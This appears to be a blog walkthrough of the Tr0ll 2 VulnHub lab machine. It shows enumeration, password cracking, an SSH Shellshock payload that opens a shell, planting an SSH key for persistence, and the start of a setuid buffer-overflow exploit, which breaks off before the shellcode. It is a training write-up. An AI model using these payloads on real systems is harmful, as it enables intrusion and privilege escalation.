<!DOCTYPE html><html lang="en" mode="dark" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="theme" content="Chirpy v2.6.2"><meta name="generator" content="Jekyll v4.1.1" /><meta property="og:title" content="Tr0ll 2 Vulnhub Walkthrough" /><meta name="author" content="Mohamed Ezzat" /><meta property="og:locale" content="en_US" /><meta name="description" content="Machine Info Difficulty: Beginner++ to intermediate Goal: Gain root access and get Proof.txt from the /root directory" /><meta property="og:description" content="Machine Info Difficulty: Beginner++ to intermediate Goal: Gain root access and get Proof.txt from the /root directory" /><link rel="canonical" href="https://mohamedaezzat.github.io/posts/troll2/" /><meta property="og:url" content="https://mohamedaezzat.github.io/posts/troll2/" /><meta property="og:site_name" content="Echo" /><meta property="og:image" content="https://mohamedaezzat.github.io/assets/img/posts/troll2/troll2.png" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2019-09-11T18:13:54+02:00" /><meta name="twitter:card" content="summary_large_image" /><meta property="twitter:image" content="https://mohamedaezzat.github.io/assets/img/posts/troll2/troll2.png" /><meta property="twitter:title" content="Tr0ll 2 Vulnhub Walkthrough" /><meta name="google-site-verification" content="SgWV4a8DvyptkO8yPJwWMZ7DexcYzADmzpG_jTBbaVY" /> <script type="application/ld+json"> {"image":"https://mohamedaezzat.github.io/assets/img/posts/troll2/troll2.png","description":"Machine Info Difficulty: Beginner++ to intermediate Goal: Gain root access and get Proof.txt from the /root directory","url":"https://mohamedaezzat.github.io/posts/troll2/","headline":"Tr0ll 2 Vulnhub Walkthrough","dateModified":"2019-09-11T18:13:54+02:00","@type":"BlogPosting","datePublished":"2019-09-11T18:13:54+02:00","mainEntityOfPage":{"@type":"WebPage","@id":"https://mohamedaezzat.github.io/posts/troll2/"},"author":{"@type":"Person","name":"Mohamed Ezzat"},"@context":"https://schema.org"}</script><title>Tr0ll 2 Vulnhub Walkthrough | Echo</title><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png"><link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png"><link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png"><link rel="icon" type="image/png" sizes="192x192" href="/assets/img/favicons/android-icon-192x192.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/manifest.json"><meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="preconnect" href="cdn.jsdelivr.net"><link rel="dns-prefetch" href="cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"><link rel="preload" href="/assets/css/post.css" as="style"><link rel="stylesheet" href="/assets/css/post.css"><link rel="preload" as="style" href="/assets/css/lib/bootstrap-toc.min.css"><link rel="stylesheet" href="/assets/css/lib/bootstrap-toc.min.css" /> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script> <script defer src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.15.0,npm/bootstrap@4/dist/js/bootstrap.min.js"></script> <script async src="/assets/js/post.min.js"></script> <script defer src="/app.js"></script> <script defer src="https://www.googletagmanager.com/gtag/js?id="></script> <script> document.addEventListener("DOMContentLoaded", function(event) { window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', ''); }); </script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column"><div id="nav-wrapper"><div id="profile-wrapper" class="d-flex flex-column"><div id="avatar" class="d-flex justify-content-center"> <a href="/" alt="avatar"> <img src="/assets/img/sample/avatar.jpg" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="profile-text mt-3"><div class="site-title"> <a href="/">Echo</a></div><div class="site-subtitle font-italic">Hacking Stuff</div></div></div><ul class="nav flex-column"><li class="nav-item d-flex justify-content-center "> <a href="/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item d-flex justify-content-center "> <a href="/tabs/categories/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item d-flex justify-content-center "> <a href="/tabs/tags/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-tags ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item d-flex justify-content-center "> <a href="/tabs/archives/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item d-flex justify-content-center "> <a href="/tabs/about/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-info ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul></div><div class="sidebar-bottom d-flex flex-wrap justify-content-around mt-4"> <a href="https://github.com/MohamedAEzzat" aria-label="github" target="_blank" rel="noopener"> <i class="fab fa-github-alt"></i> </a> <a href="https://twitter.com/" aria-label="twitter" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a> <a href=" javascript:location.href = 'mailto:' + ['mohamedahmedpk','gmail.com'].join('@')" aria-label="email" > <i class="fas fa-envelope"></i> </a> <a href="/feed.xml" aria-label="rss" > <i class="fas fa-rss"></i> </a></div></div><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Posts </a> </span> <span>Tr0ll 2 Vulnhub Walkthrough</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>Tr0ll 2 Vulnhub Walkthrough</h1><div class="post-meta text-muted d-flex flex-column"><div> Posted <span class="timeago " data-toggle="tooltip" data-placement="bottom" title="Wed, Sep 11, 2019, 6:13 PM +0200" > Sep 11, 2019 <i class="unloaded">2019-09-11T18:13:54+02:00</i> </span> by <span class="author"> Mohamed Ezzat </span></div></div><div class="post-content"> <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/troll2/troll2.png" class="preview-img"><h2 id="machine-info">Machine Info</h2><ul><li>Difficulty: Beginner++ to intermediate<li>Goal: Gain root access and get Proof.txt from the /root directory</ul><h2 id="network-scanning">Network Scanning</h2><h3 id="netdiscover">Netdiscover</h3><p>As we do every single time, we run netdiscover to discover the target’s IP address.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>netdiscover <span class="nt">-i</span> eth1
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/troll2/1.png" alt="netdiscover" /></p><h3 id="nmap">Nmap</h3><p>Then we run nmap to determine open ports and running services.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>nmap <span class="nt">-p-</span> <span class="nt">-A</span> 192.168.56.120
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/troll2/2.png" alt="nmap" /></p><h2 id="enumeration">Enumeration</h2><p>From nmap we got the following open ports and services</p><ul><li>FTP:21<li>SSH:22<li>HTTP:80</ul><p>So let’s start enumerating HTTP service.</p><h3 id="http-enumeration">HTTP Enumeration</h3><p>We go to the website to take a look over what is running there. we found only an image, so we decided to view the source code of that page and we found “Author: Tr0ll” that may we use as FTP user and password to login.</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>http://192.168.56.120/
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/troll2/3.png" alt="lol" /> <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/troll2/4.png" alt="author_Tr0ll" /></p><h3 id="ftp-enumeration">FTP Enumeration</h3><p>We try to login to FTP with username and password “Tr0ll:Tr0ll”. And we successfully have logged in, then we list the files and we found a zip file named “lmao.zip”, so we get that file on our local machine to investigate it.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre>ftp 192.168.56.120
<span class="nb">ls
</span>get lmao.zip
quit
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/troll2/5.png" alt="ftp" /></p><p>After we got that zip file, we try to unzip it but we found that we need a password to unzip. Therefore, we need to find a way to get that password.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>unzip lmao.zip
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/troll2/6.png" alt="unzip_password" /></p><h3 id="back-to-http-enumeration">Back to HTTP Enumeration</h3><p>We decided to do web directories/files brute-force using gobuster that may help us to find anything important. And we found a list of directories and files.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>gobuster <span class="nb">dir</span> <span class="nt">--url</span> http://192.168.56.120/ <span class="nt">-w</span> /usr/share/wordlists/dirb/common.txt
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/troll2/7.png" alt="gobuster" /></p><p>So let’s check “robots.txt” file that seems to be interested to us. And we found another list of directories, so we decided to save them to a file and use that file for fuzzing so that ease for us to know which directory of them is working instead of doing it manually.</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>http://192.168.56.120/robots.txt
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/troll2/8.png" alt="robots" /></p><p>We use wfuzz for fuzzing and “weblist.txt” as a wordlist that contains discovered directories. And we got four directories that are working.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>wfuzz <span class="nt">-c</span> <span class="nt">--hc</span> 404 <span class="nt">-w</span> /root/vulnhub/troll2/weblist.txt http://192.168.56.120/FUZZ
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/troll2/9.png" alt="wfuzz" /></p><p>Then we go to open each one of them and we found the same image at each directory. Therefore, we decided to download each image to investigate them.</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre>http://192.168.56.120/keep_trying/
http://192.168.56.120/noob/
192.168.56.120/ok_this_is_it/
http://192.168.56.120/dont_bother/
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/troll2/cat_the_troll.jpg" alt="cat_the_troll" /></p><p>We list the four images and we noticed that the size of the image “cat_the_troll4.jpg” is larger than the other images. Therefore, we decided to take a deep look over the contents of that image. We run strings command which helps us to determine the contents of non-text files. And as a result of strings command, we found a sentence at the last line that says “Look Deep within y0ur_self for the answer”. y0ur_self is probably a web directory, so let’s give that a try.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre><span class="nb">ls</span> <span class="nt">-l</span> <span class="k">*</span>.jpg
strings cat_the_troll4.jpg
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/troll2/11.png" alt="ls_4_images" /> <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/troll2/12.png" alt="strings" /></p><p>We go to y0ur_self directory and we found a text file named “answer.txt” that contains a list of base64 contents. We download that file and try to decode its contents.</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>http://192.168.56.120/y0ur_self/
</pre></table></code></div></div><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>wget http://192.168.56.120/y0ur_self/answer.txt
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/troll2/14.png" alt="answers_contents" /> <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/troll2/15.png" alt="wget" /></p><p>We decode the contents of “answer.txt” file using base64 command and save the results at “decoded.txt” file. Then we use fcrackzip for brute forcing in order to find the correct password. And we successfully found the correct password “ItCantReallyBeThisEasyRightLOL” to unzip “lmao.zip” file.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre><span class="nb">base64</span> <span class="nt">--decode</span> answer.txt <span class="o">&gt;</span> decoded.txt
<span class="nb">ls
cat </span>decoded.txt
fcrackzip <span class="nt">-u</span> <span class="nt">-D</span> <span class="nt">-p</span> decoded.txt lmao.zip
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/troll2/16.png" alt="decoded" /> <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/troll2/17.png" alt="fcrackzip" /></p><p>Then we unzip “lmao.zip” file and we got a file named “noob” that contains a RSA PRIVATE KEY. That private key we are going to use for SSH login.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre>unzip lmao.zip
<span class="nb">ls</span> <span class="nt">-l</span> noob
file noob
<span class="nb">cat </span>noob
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/troll2/18.png" alt="unzip" /></p><p>We try to login to SSH using the private key but it did not work and there is a printed message says “TRY HARDER LOL!”. So, we try to repeate the same SSH login command but this time with verbose option “-v” to see what prevents us to login. We noticed that before the printed message, there is a Remote Forced Command which is commonly vulnerable to Shellshock attack.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>ssh noob@192.168.56.120 <span class="nt">-i</span> noob
ssh noob@192.168.56.120 <span class="nt">-i</span> noob <span class="nt">-v</span>
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/troll2/19.png" alt="ssh" /> <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/troll2/20.png" alt="ssh_verbose" /></p><h2 id="exploitation">Exploitation</h2><h3 id="ssh-shellshock">SSH Shellshock</h3><p>Therefore, we use the following command to make sure there is a Shellshock vulnerability. If the echo command is executed and “Shellshock” is printed that means the vulnerability exists and that is what actually happened. Subsequently, we modify the part of echo command to execute “/bin/bash” and we successfully got a shell as noob user.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre>ssh noob@192.168.56.120 <span class="nt">-i</span> noob <span class="s1">'() { :;}; echo Shellshock'</span>
ssh noob@192.168.56.120 <span class="nt">-i</span> noob <span class="s1">'() { :;}; /bin/bash'</span>
<span class="nb">id</span>
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/troll2/21.png" alt="shell_noob" /></p><p>Now we need to more interactive shell. Therefore, we are going to generate a public_private key on our local machine “kali linux” then add the public key to “.ssh/authorized_keys” on Tr0ll2 machine so we can login to SSH using our generated key and get a full interactive shell.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre><span class="c"># On kali terminal</span>
ssh-keygen <span class="nt">-b</span> 2048 <span class="nt">-t</span> rsa
</pre></table></code></div></div><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre><span class="c"># On Tr0ll2 terminal</span>
<span class="nb">echo</span> <span class="s1">'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCt4+eUkScp4Vyh6ei/iPZjSnPY8lWYctZ0tdYZwNLY+RuzRo6XtFlazWFzvmnWHxYRgmVaikd0SJ3TH4MdEQdxBG9cAYrLp39NR4rFcmP4H1bNKGVxK+WqJTdI/vuAfYBGOox456tUY7lFLTKXfkXbjtpGZ11ui/wUF0WKR+hMfzBTzeYBUBWcRCuZMQBONlotKO/QrjT9SOlJLG6Vm1aoJxk1KeDE5Dhc04uaCqgqQ6cazk5b7+PXX8yNuCI4qSDnfXLVRPX01nLiOOwjqX+PZ1VlaAcIBezug5+/xCFBDD4aItDg40BdIcNCR/TiQkloYv+t4y/+1GbRKFH0G2t1 root@kali'</span> <span class="o">&gt;</span> .ssh/authorized_keys
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/troll2/22.png" alt="ssh_keygen" /> <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/troll2/23.png" alt="echo_pubkey" /></p><p>Then we try login to SSH and we are successfully logged in with a full interactive shell as a noob user.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>ssh noob@192.168.56.120 <span class="nt">-i</span> id_rsa
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/troll2/24.png" alt="ssh_login_fullinteractiveshell" /></p><h2 id="privilege-escalation">Privilege Escalation</h2><h3 id="buffer-overflow">Buffer Overflow</h3><p>Now we need to escalate our privileges to root. Therefore, we run the find command to look for any setuid directories/files. We found a directory named “/choose_wisely” that looks interesting. So, we go to that directory and list its files. We found three doors “door1, door2 and door3”. We first go to “/door1” directory and we found an executable file named “r00t”. We decided to run that file and we found that it needs an input. So, we think that probably there is a Buffer Overflow vulnerability through that executable file. We run a gdb debugger then run disassemble command on main() function to take a look over the called functions and we found that there is a strcpy() function which is commonly vulnerable to Buffer Overflow vulnerability.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre><td class="rouge-code"><pre>find / <span class="nt">-perm</span> <span class="nt">-4000</span> 2&gt;/dev/null
<span class="nb">cd</span> /nothing_to_see_here/choose_wisely
<span class="nb">ls
cd </span>door1
<span class="nb">ls
</span>file r00t
./r00t
gdb <span class="nt">-q</span> r00t
disas main
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/troll2/25.png" alt="find_command" /> <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/troll2/26.png" alt="gdb_r00t" /></p><p>For further check, we run r00t program and pass to it a thousand of character “A” as an input. Then the program returns a “Segmentation fault” message which indicates there is a Buffer Overflow vulnerability.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>./r00t <span class="si">$(</span>python <span class="nt">-c</span> <span class="s1">'print "A" * 1000'</span><span class="si">)</span>
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/troll2/27.png" alt="1000A" /></p><p>Now we use a metasploit tool named “pattern_create.rb” that creates a distinct pattern of characters with a specified length (In our case we use 1000 for length) so we pass that pattern to the vulnerable program to help us to determine the EIP (Extended Instruction Pointer) location. Then we take the returned value that overwrite the EIP and pass it to pattern_offset.rb.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre><span class="c"># On kali terminal</span>
locate pattern_create.rb
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb <span class="nt">-l</span> 1000
</pre></table></code></div></div><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre><span class="c"># On Tr0ll2 terminal</span>
<span class="nb">cd</span> ../door3
gdb <span class="nt">-q</span> r00t
r &lt;pattern from pattern_create.rb&gt;
</pre></table></code></div></div><blockquote><p><strong>Note:</strong> The r00t program changes its door directory frequently so you need to keep that in mind . Also there is a “HARD MODE” that prevents you to use “ls” for 2 minutes. As well as, keep in mind if that message appeared to you “Good job, stand by, executing root shell…”. Know that it is a trap and your connection will be closed so you need to terminate the program immediately using “Ctrl + c” and change your directory to any other door.</p></blockquote><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/troll2/28.png" alt="pattern_create" /> <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/troll2/29.png" alt="EIP_value" /></p><p>Then we use an another metasploit tool named “patern_offset.rb” to help us to determine the EIP location where the offset means the distance between the buffer start address and the EBP (Extended Base Pointer) address, and the four bytes above the EBP address is the location of EIP (or Return Address) which its size is four bytes.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>locate pattern_offset
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb <span class="nt">-q</span> 6a413969
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/troll2/30.png" alt="offset_268" /></p><p>Subsequently, we run the r00t program and pass to it 268 characters of “A” and 4 characters of “B” to make sure that we reliably control EIP. From the returned value “0x42424242” which is four B’s in the hexadicimal, we are sure that we can reliably overwrite the EIP.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>gdb <span class="nt">-q</span> r00t
r <span class="si">$(</span>python <span class="nt">-c</span> <span class="s1">'print "A" * 268 + "B" * 4'</span><span class="si">)</span>
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/posts/troll2/31.png" alt="BBBB" /></p><p>Now we are looking for ESP (Extended Stack Pointer) address to pass it to the r00t program instead of the four “B’s”. So, we decided to run the r00t program using the gdb debugger in a modified environement. We unset all the environement variables (LINES and COLUMNS) to avoid getting invalid ESP address when we run the r00t program without a debugger since when any program gets executed, the environment varibales are pushed into the stack so the stack may looks deeper when you run the program inside a debugger than run it in normal which may affect the ESP address. We run the r00t program and pass to it the same previous input but this time we add to it 16 of nop sled “\x90” to ensure the execution of the shellcode that we are going to create later and 100 characters of “C” that will be replaced by the shellcode later. After we run the r00t program, here is the ESP address that we are going to use “0xbffffc80”.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre><span class="nb">env</span> - gdb r00t
show <span class="nb">env
unset env </span>LINES
<span class="nb">unset env </span>COLUMNS
r <span class="si">$(</span>python <span class="nt">-c</span> <span class="s1">'print "A" * 268 + "B" * 4 + "\x90" * 16 + "C" * 100'</span><span class="si">)</span>
info registers
